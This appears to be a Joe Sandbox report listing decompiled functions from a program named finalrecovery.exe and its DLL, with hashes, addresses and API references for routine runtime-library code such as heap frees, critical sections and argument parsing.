Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: c7f011bfc6f33b9e8bad2378bc25398f3ba466d7650b7ac976f56426f8d18ac9
Instruction ID: 715ce5c9736b7f91a95e601ba6ddcc69c3ee09774bd4adcea20440f8734e0ff2
Opcode Fuzzy Hash: c7f011bfc6f33b9e8bad2378bc25398f3ba466d7650b7ac976f56426f8d18ac9
Instruction Fuzzy Hash: 96F0AC36541269BBEB229FA5CC4DE897FA6FB493E1F158014FA1995120CA72D820DB90

Uniqueness

Uniqueness Score: -1.00%

Function 0040EF50 Relevance: 6.0, APIs: 4, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E0040EF50(long _a4) {
				long _t3;
				intOrPtr* _t7;

				_t7 =  *0x450514;
				if(_t7 == 0) {
					LeaveCriticalSection(0x4504fc);
					_t3 = WaitForSingleObjectEx( *0x4504f8, _a4, 0);
					EnterCriticalSection(0x4504fc);
					return _t3;
				}
				 *0x42e234(0x4504f4, 0x4504fc, _a4);
				return  *_t7();
			}

0x0040ef54
0x0040ef5c
0x0040ef7d
0x0040ef8e
0x0040ef95
0x00000000
0x0040ef95
0x0040ef6d
0x00000000

APIs

SleepConditionVariableCS.KERNELBASE(?,0040EEED,00000064), ref: 0040EF73
LeaveCriticalSection.KERNEL32(004504FC,004063FC,?,0040EEED,00000064,?,?,004063FC,00450F40,00450F44,00450F45), ref: 0040EF7D
WaitForSingleObjectEx.KERNEL32(004063FC,00000000,?,0040EEED,00000064,?,?,004063FC,00450F40,00450F44,00450F45), ref: 0040EF8E
EnterCriticalSection.KERNEL32(004504FC,?,0040EEED,00000064,?,?,004063FC,00450F40,00450F44,00450F45), ref: 0040EF95

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
String ID:
API String ID: 3269011525-0
Opcode ID: f64a1fe2d3c08a56fcd9346185c77cb8d93b1cbc53ddc582fa2c2fd8cd520f41
Instruction ID: e65397192a9a5e28f2c9c87ec05855080aaf69143aa33e358c3b9ad81d9fb2d4
Opcode Fuzzy Hash: f64a1fe2d3c08a56fcd9346185c77cb8d93b1cbc53ddc582fa2c2fd8cd520f41
Instruction Fuzzy Hash: 16E0D835781225FBC7212F52EC08AAE7F18EF06712B404032FF4566262CB7468228FDD

Uniqueness

Uniqueness Score: -1.00%

Function 0041ABE7 Relevance: 6.0, APIs: 4, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041ABE7() {

				E0041E238( *0x450bd0);
				 *0x450bd0 = 0;
				E0041E238( *0x450bd4);
				 *0x450bd4 = 0;
				E0041E238( *0x450cd0);
				 *0x450cd0 = 0;
				E0041E238( *0x450cd4);
				 *0x450cd4 = 0;
				return 1;
			}

0x0041abf0
0x0041abfd
0x0041ac03
0x0041ac0e
0x0041ac14
0x0041ac1f
0x0041ac25
0x0041ac2d
0x0041ac36

APIs

_free.LIBCMT ref: 0041ABF0

Part of subcall function 0041E238: HeapFree.KERNEL32(00000000,00000000,?,00425D07,?,00000000,?,?,?,00425FAA,?,00000007,?,?,0042649D,?), ref: 0041E24E
Part of subcall function 0041E238: GetLastError.KERNEL32(?,?,00425D07,?,00000000,?,?,?,00425FAA,?,00000007,?,?,0042649D,?,?), ref: 0041E260

_free.LIBCMT ref: 0041AC03
_free.LIBCMT ref: 0041AC14
_free.LIBCMT ref: 0041AC25

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 7600757227941bb7c95799b95531e21e679b1f58566f426ab12c79b805c51534
Instruction ID: a11de69c014321f5dc8e2f471937d82d717c512d0dce56fedb92718468f67189
Opcode Fuzzy Hash: 7600757227941bb7c95799b95531e21e679b1f58566f426ab12c79b805c51534
Instruction Fuzzy Hash: 0AE04F7F411360BB960A2F56FE51685BA25B76970AB4002ABFC003A233CB759051AF8E

Uniqueness

Uniqueness Score: -1.00%

Function 10006778 Relevance: 6.0, APIs: 4, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10006778() {

				E100079CC( *0x1001834c);
				 *0x1001834c = 0;
				E100079CC( *0x10018350);
				 *0x10018350 = 0;
				E100079CC( *0x10018110);
				 *0x10018110 = 0;
				E100079CC( *0x10018114);
				 *0x10018114 = 0;
				return 1;
			}

0x10006781
0x1000678e
0x10006794
0x1000679f
0x100067a5
0x100067b0
0x100067b6
0x100067be
0x100067c7

APIs

_free.LIBCMT ref: 10006781

Part of subcall function 100079CC: RtlFreeHeap.NTDLL(00000000,00000000,?,10006680), ref: 100079E2
Part of subcall function 100079CC: GetLastError.KERNEL32(?,?,10006680), ref: 100079F4

_free.LIBCMT ref: 10006794
_free.LIBCMT ref: 100067A5
_free.LIBCMT ref: 100067B6

Memory Dump Source

Source File: 00000002.00000002.324049743.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.324045427.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324060416.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324067694.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_finalrecovery.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 75bd068e35e85004918474f377b0304826452ae9da8ec7b43721f587b131a2e2
Instruction ID: 381de8dc8cc995c0ffb6054aaace2c30b829c34e5d5802529b2750e75a419679
Opcode Fuzzy Hash: 75bd068e35e85004918474f377b0304826452ae9da8ec7b43721f587b131a2e2
Instruction Fuzzy Hash: C5E0E676C10131AAFB13AF24DCC64463FA5F745E443498405F52C12236C73697139FE1

Uniqueness

Uniqueness Score: -1.00%

Function 00403B40 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 207
COMMON

Download Yara Rule

C-Code - Quality: 41%

			E00403B40(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi) {
				intOrPtr _v8;
				char _v16;
				char _v24;
				signed int _v32;
				char _v36;
				char _v40;
				char _v44;
				intOrPtr _v48;
				char _v52;
				char _v68;
				intOrPtr _v72;
				char _v76;
				char _v92;
				intOrPtr _v96;
				void* _v116;
				signed int _v132;
				void* __esi;
				void* __ebp;
				signed int _t71;
				signed int _t72;
				intOrPtr _t81;
				intOrPtr* _t87;
				intOrPtr _t96;
				void* _t109;
				void* _t111;
				char _t115;
				char _t118;
				intOrPtr* _t127;
				intOrPtr _t128;
				intOrPtr _t133;
				intOrPtr _t134;
				void* _t136;
				void* _t137;
				intOrPtr* _t141;
				void* _t142;
				intOrPtr* _t144;
				intOrPtr _t145;
				void* _t146;
				intOrPtr* _t147;
				signed int _t151;
				void* _t155;
				signed int _t158;
				void* _t159;

				_push(__ebx);
				_t111 = _t155;
				_t158 = (_t155 - 0x00000008 & 0xfffffff8) + 4;
				_v8 =  *((intOrPtr*)(_t111 + 4));
				_t151 = _t158;
				_push(0xffffffff);
				_push(0x42c315);
				_push( *[fs:0x0]);
				_push(_t111);
				_t159 = _t158 - 0x58;
				_t71 =  *0x43d054; // 0x8e1b5714
				_t72 = _t71 ^ _t151;
				_v32 = _t72;
				_push(__edi);
				_push(_t72);
				 *[fs:0x0] =  &_v24;
				_t141 = __ecx;
				_v44 = __ecx;
				_v44 = __ecx;
				E0040BB10(_t111,  &_v68, __edx, __ecx,  *((intOrPtr*)(_t111 + 8)));
				_t144 =  *((intOrPtr*)(_t111 + 0x10));
				_v44 =  *((intOrPtr*)(_t111 + 0xc));
				_v16 = 0;
				_t115 = _v52;
				if(_t115 != 0) {
					if(_v48 - _t115 < 2) {
						_v36 = 0;
						E00402990(_t111,  &_v68, __ecx, _t144, 2, _v36, ": ", 2);
					} else {
						_v52 = _t115 + 2;
						_t109 =  >=  ? _v68 :  &_v68;
						 *((short*)(_t109 + _t115)) = 0x203a;
						 *((char*)(_t109 + _t115 + 2)) = 0;
					}
				}
				 *((intOrPtr*)( *_t144 + 8))( &_v92, _v44);
				_v16 = 1;
				_t118 = _v76;
				_t132 =  >=  ? _v92 :  &_v92;
				_t145 = _v52;
				_v44 = _t118;
				_push(_t118);
				_push( >=  ? _v92 :  &_v92);
				if(_t118 > _v48 - _t145) {
					_v44 = 0;
					_push(_v44);
					_push(_t118);
					_t81 = E00402990(_t111,  &_v68, _t141, _t145);
				} else {
					_v52 = _t145 + _t118;
					_t102 =  >=  ? _v68 :  &_v68;
					_t145 = _t145 + ( >=  ? _v68 :  &_v68);
					_push(_t145);
					E00410440();
					_t81 = _v44;
					_t159 = _t159 + 0xc;
					 *((char*)(_t145 + _t81)) = 0;
				}
				_t133 = _v72;
				if(_t133 < 0x10) {
					L11:
					asm("movups xmm1, [ebp-0x38]");
					 *_t141 = 0x42e2d4;
					asm("movq xmm0, [ebp-0x28]");
					asm("movq [ebp-0x58], xmm0");
					asm("xorps xmm0, xmm0");
					asm("movd eax, xmm1");
					asm("movq [edi+0x4], xmm0");
					asm("movups [ebp-0x68], xmm1");
					_t121 =  >=  ? _t81 :  &_v116;
					_v52 = 0;
					_v48 = 0xf;
					_v68 = 0;
					_v40 =  >=  ? _t81 :  &_v116;
					_v36 = 1;
					E0040FEF1( &_v40, _t141 + 4);
					_t134 = _v96;
					_t159 = _t159 + 8;
					 *_t141 = 0x42e320;
					if(_t134 < 0x10) {
						L15:
						 *_t141 = 0x439c9c;
						 *((intOrPtr*)(_t141 + 0xc)) =  *((intOrPtr*)(_t111 + 0xc));
						 *((intOrPtr*)(_t141 + 0x10)) =  *((intOrPtr*)(_t111 + 0x10));
						 *[fs:0x0] = _v24;
						_pop(_t142);
						_pop(_t146);
						return E0040EB3F(_t141, _t111, _v32 ^ _t151,  *((intOrPtr*)(_t111 + 0x10)), _t142, _t146);
					} else {
						_t127 = _v116;
						_t136 = _t134 + 1;
						_t87 = _t127;
						if(_t136 < 0x1000) {
							L14:
							_push(_t136);
							E0040ED7F(_t127);
							goto L15;
						} else {
							_t127 =  *((intOrPtr*)(_t127 - 4));
							_t136 = _t136 + 0x23;
							if(_t87 - _t127 + 0xfffffffc > 0x1f) {
								goto L17;
							} else {
								goto L14;
							}
						}
					}
				} else {
					_t128 = _v92;
					_t137 = _t133 + 1;
					_t96 = _t128;
					if(_t137 < 0x1000) {
						L10:
						_push(_t137);
						_t81 = E0040ED7F(_t128);
						_t159 = _t159 + 8;
						goto L11;
					} else {
						_t127 =  *((intOrPtr*)(_t128 - 4));
						_t136 = _t137 + 0x23;
						if(_t96 - _t127 + 0xfffffffc > 0x1f) {
							E004134A7(_t111, _t136, __eflags);
							L17:
							E004134A7(_t111, _t136, __eflags);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_push(_t151);
							_push(_t145);
							_t147 = _t127;
							 *_t147 = 0x42e2d4;
							E0040FF54(_t147 + 4);
							__eflags = _v132 & 0x00000001;
							if((_v132 & 0x00000001) != 0) {
								_push(0x14);
								E0040ED7F(_t147);
							}
							return _t147;
						} else {
							goto L10;
						}
					}
				}
			}

0x00403b40
0x00403b41
0x00403b49
0x00403b50
0x00403b54
0x00403b56
0x00403b58
0x00403b63
0x00403b64
0x00403b65
0x00403b68
0x00403b6d
0x00403b6f
0x00403b73
0x00403b74
0x00403b78
0x00403b7e
0x00403b80
0x00403b8a
0x00403b8d
0x00403b95
0x00403b98
0x00403b9b
0x00403ba2
0x00403ba7
0x00403bb3
0x00403bdc
0x00403be8
0x00403bb5
0x00403bbb
0x00403bc6
0x00403bca
0x00403bce
0x00403bce
0x00403bb3
0x00403bf8
0x00403bfb
0x00403c06
0x00403c09
0x00403c10
0x00403c15
0x00403c18
0x00403c19
0x00403c1c
0x00403c43
0x00403c47
0x00403c4a
0x00403c4e
0x00403c1e
0x00403c25
0x00403c2b
0x00403c2f
0x00403c31
0x00403c32
0x00403c37
0x00403c3a
0x00403c3d
0x00403c3d
0x00403c53
0x00403c59
0x00403c87
0x00403c87
0x00403c8e
0x00403c94
0x00403c99
0x00403c9e
0x00403ca5
0x00403ca9
0x00403cae
0x00403cb2
0x00403cb5
0x00403cbf
0x00403cca
0x00403ccf
0x00403cd2
0x00403cd6
0x00403cdb
0x00403cde
0x00403ce1
0x00403cea
0x00403d14
0x00403d1c
0x00403d22
0x00403d25
0x00403d2b
0x00403d33
0x00403d34
0x00403d45
0x00403cec
0x00403cec
0x00403cef
0x00403cf0
0x00403cf8
0x00403d0a
0x00403d0a
0x00403d0c
0x00000000
0x00403cfa
0x00403cfa
0x00403cfd
0x00403d08
0x00000000
0x00000000
0x00000000
0x00000000
0x00403d08
0x00403cf8
0x00403c5b
0x00403c5b
0x00403c5e
0x00403c5f
0x00403c67
0x00403c7d
0x00403c7d
0x00403c7f
0x00403c84
0x00000000
0x00403c69
0x00403c69
0x00403c6c
0x00403c77
0x00403d48
0x00403d4d
0x00403d4d
0x00403d52
0x00403d53
0x00403d54
0x00403d55
0x00403d56
0x00403d57
0x00403d58
0x00403d59
0x00403d5a
0x00403d5b
0x00403d5c
0x00403d5d
0x00403d5e
0x00403d5f
0x00403d60
0x00403d63
0x00403d64
0x00403d69
0x00403d70
0x00403d78
0x00403d7c
0x00403d7e
0x00403d81
0x00403d86
0x00403d8d
0x00000000
0x00000000
0x00000000
0x00403c77
0x00403c67

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00403CD6
___std_exception_destroy.LIBVCRUNTIME ref: 00403D70

Strings

`=@, xrefs: 00403D1C

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy___std_exception_destroy
String ID: `=@
API String ID: 2970364248-2879527708
Opcode ID: 3fda5044b6df40b04bbc51e1a604dfc091ed6afe0e0a35c7507a83b2c4760c62
Instruction ID: c45e531005c49128b41c2267f063fb0cd9faf697cf2b940bc52e0bde6c7d21ef
Opcode Fuzzy Hash: 3fda5044b6df40b04bbc51e1a604dfc091ed6afe0e0a35c7507a83b2c4760c62
Instruction Fuzzy Hash: DF719271A002489BDB04CFA9C881BDDFBB5EF49314F14812EE805B7285D778AA84CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004199DD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00419A6D

Strings

pow, xrefs: 00419A45, 00419A62

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: a582e46973c46f5eef58ff1d0f172840d36d42b9c83d8389a540df618c71c77d
Instruction ID: 9cc51f21ed2453303617aa123ec70b4e3589bf7e9b4b6aa8f8e0223717c9d32f
Opcode Fuzzy Hash: a582e46973c46f5eef58ff1d0f172840d36d42b9c83d8389a540df618c71c77d
Instruction Fuzzy Hash: B3518171B0810196DB11BF14E9213AB77B0AF40B82FB0496FE4D5423A8DF3C8ED59A4E

Uniqueness

Uniqueness Score: -1.00%

Function 0041A26D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0041A26D(void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				char* _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t26;
				intOrPtr* _t36;
				signed int _t37;
				signed int _t40;
				char _t42;
				signed int _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				intOrPtr _t48;
				signed int _t49;
				signed int _t54;
				void* _t57;
				intOrPtr* _t58;
				signed int _t64;
				signed int _t66;

				_t57 = __edx;
				_t48 = _a4;
				if(_t48 != 0) {
					__eflags = _t48 - 2;
					if(_t48 == 2) {
						L5:
						E00424803(_t48);
						E0042424A(_t48, _t57, 0, 0x450790, 0, 0x450790, 0x104);
						_t26 =  *0x450cd8; // 0x15b34a0
						 *0x450cc8 = 0x450790;
						_v20 = _t26;
						__eflags = _t26;
						if(_t26 == 0) {
							L7:
							_t26 = 0x450790;
							_v20 = 0x450790;
							L8:
							_v8 = 0;
							_v16 = 0;
							_t64 = E0041A517(E0041A3A3( &_v8, _t26, 0, 0,  &_v8,  &_v16), _v8, _v16, 1);
							__eflags = _t64;
							if(__eflags != 0) {
								E0041A3A3( &_v8, _v20, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
								__eflags = _t48 - 1;
								if(_t48 != 1) {
									_v12 = 0;
									_push( &_v12);
									_t49 = E00424178(_t64, _t64);
									__eflags = _t49;
									if(_t49 == 0) {
										_t58 = _v12;
										_t54 = 0;
										_t36 = _t58;
										__eflags =  *_t58;
										if( *_t58 == 0) {
											L17:
											_t37 = 0;
											 *0x450ccc = _t54;
											_v12 = 0;
											_t49 = 0;
											 *0x450cd0 = _t58;
											L18:
											E0041E238(_t37);
											_v12 = 0;
											L19:
											E0041E238(_t64);
											_t40 = _t49;
											L20:
											return _t40;
										} else {
											goto L16;
										}
										do {
											L16:
											_t36 = _t36 + 4;
											_t54 = _t54 + 1;
											__eflags =  *_t36;
										} while ( *_t36 != 0);
										goto L17;
									}
									_t37 = _v12;
									goto L18;
								}
								_t42 = _v8 - 1;
								__eflags = _t42;
								 *0x450ccc = _t42;
								_t43 = _t64;
								_t64 = 0;
								 *0x450cd0 = _t43;
								L12:
								_t49 = 0;
								goto L19;
							}
							_t44 = E00413571(__eflags);
							_push(0xc);
							_pop(0);
							 *_t44 = 0;
							goto L12;
						}
						__eflags =  *_t26;
						if( *_t26 != 0) {
							goto L8;
						}
						goto L7;
					}
					__eflags = _t48 - 1;
					if(__eflags == 0) {
						goto L5;
					}
					_t45 = E00413571(__eflags);
					_t66 = 0x16;
					 *_t45 = _t66;
					E00413497();
					_t40 = _t66;
					goto L20;
				}
				return 0;
			}

0x0041a26d
0x0041a276
0x0041a27b
0x0041a285
0x0041a288
0x0041a2a5
0x0041a2a6
0x0041a2b9
0x0041a2be
0x0041a2c6
0x0041a2cc
0x0041a2cf
0x0041a2d1
0x0041a2d8
0x0041a2d8
0x0041a2da
0x0041a2dd
0x0041a2e0
0x0041a2e7
0x0041a300
0x0041a305
0x0041a307
0x0041a328
0x0041a330
0x0041a333
0x0041a34e
0x0041a351
0x0041a358
0x0041a35c
0x0041a35e
0x0041a365
0x0041a368
0x0041a36a
0x0041a36c
0x0041a36e
0x0041a378
0x0041a378
0x0041a37a
0x0041a380
0x0041a383
0x0041a385
0x0041a38b
0x0041a38c
0x0041a392
0x0041a395
0x0041a396
0x0041a39c
0x0041a39f
0x00000000
0x00000000
0x00000000
0x00000000
0x0041a370
0x0041a370
0x0041a370
0x0041a373
0x0041a374
0x0041a374
0x00000000
0x0041a370
0x0041a360
0x00000000
0x0041a360
0x0041a338
0x0041a338
0x0041a339
0x0041a33e
0x0041a340
0x0041a342
0x0041a347
0x0041a347
0x00000000
0x0041a347
0x0041a309
0x0041a30e
0x0041a310
0x0041a311
0x00000000
0x0041a311
0x0041a2d3
0x0041a2d6
0x00000000
0x00000000
0x00000000
0x0041a2d6
0x0041a28a
0x0041a28d
0x00000000
0x00000000
0x0041a28f
0x0041a296
0x0041a297
0x0041a299
0x0041a29e
0x00000000
0x0041a29e
0x00000000

Strings

C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe, xrefs: 0041A2B0, 0041A2B7, 0041A2ED

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe
API String ID: 0-3352219999
Opcode ID: 0e731db7584ad60d578d779bbaf5b01c679ed323d4b1edda6f57c3d6e2435286
Instruction ID: 54ca2e2b2c910831d33f8d1abf6b2c3edf597ccdf62c1b78944918f2fe614005
Opcode Fuzzy Hash: 0e731db7584ad60d578d779bbaf5b01c679ed323d4b1edda6f57c3d6e2435286
Instruction Fuzzy Hash: 4E41E571A01218AFCB16DF9ACC81ADFBBB8EB85310F10006BF814D7351D7788A90DB5A

Uniqueness

Uniqueness Score: -1.00%

Function 10005FC8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E10005FC8(void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				char* _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				char* _t26;
				intOrPtr* _t36;
				signed int _t37;
				signed int _t40;
				char _t42;
				signed int _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				intOrPtr _t48;
				signed int _t49;
				signed int _t54;
				void* _t57;
				intOrPtr* _t58;
				void* _t59;
				signed int _t64;
				signed int _t66;

				_t57 = __edx;
				_t48 = _a4;
				if(_t48 != 0) {
					__eflags = _t48 - 2;
					if(_t48 == 2) {
						L5:
						_push(_t59);
						E10008981(_t48, _t59);
						E100083C8(_t48, _t57, 0, 0x10017d98, 0, 0x10017d98, 0x104);
						_t26 =  *0x10018118; // 0x15b34a0
						 *0x10018108 = 0x10017d98;
						_v20 = _t26;
						__eflags = _t26;
						if(_t26 == 0) {
							L7:
							_t26 = 0x10017d98;
							_v20 = 0x10017d98;
							L8:
							_v8 = 0;
							_v16 = 0;
							_t64 = E10006272(E100060FE( &_v8, _t26, 0, 0,  &_v8,  &_v16), _v8, _v16, 1);
							__eflags = _t64;
							if(__eflags != 0) {
								E100060FE( &_v8, _v20, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
								__eflags = _t48 - 1;
								if(_t48 != 1) {
									_v12 = 0;
									_push( &_v12);
									_t49 = E100082BB(_t64, _t64);
									__eflags = _t49;
									if(_t49 == 0) {
										_t58 = _v12;
										_t54 = 0;
										_t36 = _t58;
										__eflags =  *_t58;
										if( *_t58 == 0) {
											L17:
											_t37 = 0;
											 *0x1001810c = _t54;
											_v12 = 0;
											_t49 = 0;
											 *0x10018110 = _t58;
											L18:
											E100079CC(_t37);
											_v12 = 0;
											L19:
											E100079CC(_t64);
											_t40 = _t49;
											L20:
											return _t40;
										} else {
											goto L16;
										}
										do {
											L16:
											_t36 = _t36 + 4;
											_t54 = _t54 + 1;
											__eflags =  *_t36;
										} while ( *_t36 != 0);
										goto L17;
									}
									_t37 = _v12;
									goto L18;
								}
								_t42 = _v8 - 1;
								__eflags = _t42;
								 *0x1001810c = _t42;
								_t43 = _t64;
								_t64 = 0;
								 *0x10018110 = _t43;
								L12:
								_t49 = 0;
								goto L19;
							}
							_t44 = E100058B6(__eflags);
							_push(0xc);
							_pop(0);
							 *_t44 = 0;
							goto L12;
						}
						__eflags =  *_t26;
						if( *_t26 != 0) {
							goto L8;
						}
						goto L7;
					}
					__eflags = _t48 - 1;
					if(__eflags == 0) {
						goto L5;
					}
					_t45 = E100058B6(__eflags);
					_t66 = 0x16;
					 *_t45 = _t66;
					E100057DC();
					_t40 = _t66;
					goto L20;
				}
				return 0;
			}

0x10005fc8
0x10005fd1
0x10005fd6
0x10005fe0
0x10005fe3
0x10006000
0x10006000
0x10006001
0x10006014
0x10006019
0x10006021
0x10006027
0x1000602a
0x1000602c
0x10006033
0x10006033
0x10006035
0x10006038
0x1000603b
0x10006042
0x1000605b
0x10006060
0x10006062
0x10006083
0x1000608b
0x1000608e
0x100060a9
0x100060ac
0x100060b3
0x100060b7
0x100060b9
0x100060c0
0x100060c3
0x100060c5
0x100060c7
0x100060c9
0x100060d3
0x100060d3
0x100060d5
0x100060db
0x100060de
0x100060e0
0x100060e6
0x100060e7
0x100060ed
0x100060f0
0x100060f1
0x100060f7
0x100060fa
0x00000000
0x00000000
0x00000000
0x00000000
0x100060cb
0x100060cb
0x100060cb
0x100060ce
0x100060cf
0x100060cf
0x00000000
0x100060cb
0x100060bb
0x00000000
0x100060bb
0x10006093
0x10006093
0x10006094
0x10006099
0x1000609b
0x1000609d
0x100060a2
0x100060a2
0x00000000
0x100060a2
0x10006064
0x10006069
0x1000606b
0x1000606c
0x00000000
0x1000606c
0x1000602e
0x10006031
0x00000000
0x00000000
0x00000000
0x10006031
0x10005fe5
0x10005fe8
0x00000000
0x00000000
0x10005fea
0x10005ff1
0x10005ff2
0x10005ff4
0x10005ff9
0x00000000
0x10005ff9
0x00000000

Strings

C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe, xrefs: 1000600B, 10006012, 10006048

Memory Dump Source

Source File: 00000002.00000002.324049743.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.324045427.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324060416.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324067694.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_finalrecovery.jbxd

Similarity

API ID:
String ID: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe
API String ID: 0-3352219999
Opcode ID: 9c2515709f9ef5ba36c4442dad0607202447827d3e4e4dc3e46157d8fc5dcb7b
Instruction ID: e5d0a91aa81edd261364053414ee3e428e2930e14714e00a74dabaf2ace380e5
Opcode Fuzzy Hash: 9c2515709f9ef5ba36c4442dad0607202447827d3e4e4dc3e46157d8fc5dcb7b
Instruction Fuzzy Hash: 3D419071E44215ABFB21CB99CC81A9FBBFDEF89390F204066F905A7215DB719B41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0041243C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 69%

			E0041243C(void* __ecx, void* __edx, signed char* _a4, signed char* _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				signed int _v36;
				void* _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr _v56;
				void _v60;
				signed char* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t74;
				void* _t75;
				char _t76;
				signed char _t78;
				signed int _t80;
				signed char* _t81;
				signed int _t82;
				signed int _t83;
				intOrPtr* _t87;
				void* _t90;
				signed char* _t93;
				intOrPtr* _t96;
				signed char _t97;
				intOrPtr _t98;
				intOrPtr _t99;
				intOrPtr* _t101;
				signed int _t102;
				signed int _t103;
				signed char _t108;
				signed char* _t111;
				signed int _t112;
				void* _t113;
				signed char* _t116;
				void* _t121;
				signed int _t123;
				void* _t130;
				void* _t131;

				_t110 = __edx;
				_t100 = __ecx;
				_t96 = _a4;
				if( *_t96 == 0x80000003) {
					return _t74;
				} else {
					_t75 = E00411D16(_t96, __ecx, __edx, _t113, _t121, _t113, _t121);
					if( *((intOrPtr*)(_t75 + 8)) != 0) {
						__imp__EncodePointer(0);
						_t121 = _t75;
						if( *((intOrPtr*)(E00411D16(_t96, __ecx, __edx, 0, _t121) + 8)) != _t121 &&  *_t96 != 0xe0434f4d &&  *_t96 != 0xe0434352) {
							_t87 = E0040FC08(__edx, 0, _t121, _t96, _a8, _a12, _a16, _a20, _a28, _a32);
							_t130 = _t130 + 0x1c;
							if(_t87 != 0) {
								L16:
								return _t87;
							}
						}
					}
					_t76 = _a20;
					_v24 = _t76;
					_v20 = 0;
					if( *((intOrPtr*)(_t76 + 0xc)) > 0) {
						_push(_a28);
						E0040FB3B(_t96, _t100, 0, _t121,  &_v40,  &_v24, _a24, _a16, _t76);
						_t112 = _v36;
						_t131 = _t130 + 0x18;
						_t87 = _v40;
						_v16 = _t87;
						_v8 = _t112;
						if(_t112 < _v28) {
							_t102 = _t112 * 0x14;
							_v12 = _t102;
							do {
								_t103 = 5;
								_t90 = memcpy( &_v60,  *((intOrPtr*)( *_t87 + 0x10)) + _t102, _t103 << 2);
								_t131 = _t131 + 0xc;
								if(_v60 <= _t90 && _t90 <= _v56) {
